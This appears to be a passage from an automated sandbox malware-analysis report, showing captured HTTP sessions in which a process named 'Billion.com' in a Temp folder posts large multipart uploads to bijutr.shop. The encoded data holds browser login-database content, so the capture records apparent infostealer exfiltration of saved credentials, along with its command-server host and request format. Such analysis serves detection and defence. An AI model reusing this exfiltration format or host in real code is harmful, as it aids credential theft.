                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:31 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 51 39 30 52 39 30 5a 4d 4f 5a 55 41 49 4d 47 44 4a 4d 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 51 39 30 52 39 30 5a 4d 4f 5a 55 41 49 4d 47 44 4a 4d 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 51 39 30 52 39 30 5a 4d 4f 5a 55 41 49 4d 47 44 4a 4d 4f 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------Q90R90ZMOZUAIMGDJMOZContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------Q90R90ZMOZUAIMGDJMOZContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------Q90R90ZMOZUAIMGDJMOZCont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:31 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68
                                                                                                                                                                                                                                                                                                        Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:31 UTC3313OUTData Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31
                                                                                                                                                                                                                                                                                                        Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:33 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:33 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        34192.168.2.650022188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:34 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----MYUKN7900ZU37YMY5FK6
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 262605
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:34 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 59 55 4b 4e 37 39 30 30 5a 55 33 37 59 4d 59 35 46 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4d 59 55 4b 4e 37 39 30 30 5a 55 33 37 59 4d 59 35 46 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4d 59 55 4b 4e 37 39 30 30 5a 55 33 37 59 4d 59 35 46 4b 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------MYUKN7900ZU37YMY5FK6Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------MYUKN7900ZU37YMY5FK6Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------MYUKN7900ZU37YMY5FK6Cont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:34 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                                                                        Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:35 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        35192.168.2.64998218.161.69.304437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:35 UTC925OUTGET /b?rn=1735064913991&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=302665E99E416E3C182470B69FCB6F6B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:35 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:35 GMT
                                                                                                                                                                                                                                                                                                        Accept-CH: UA, Platform, Arch, Model, Mobile
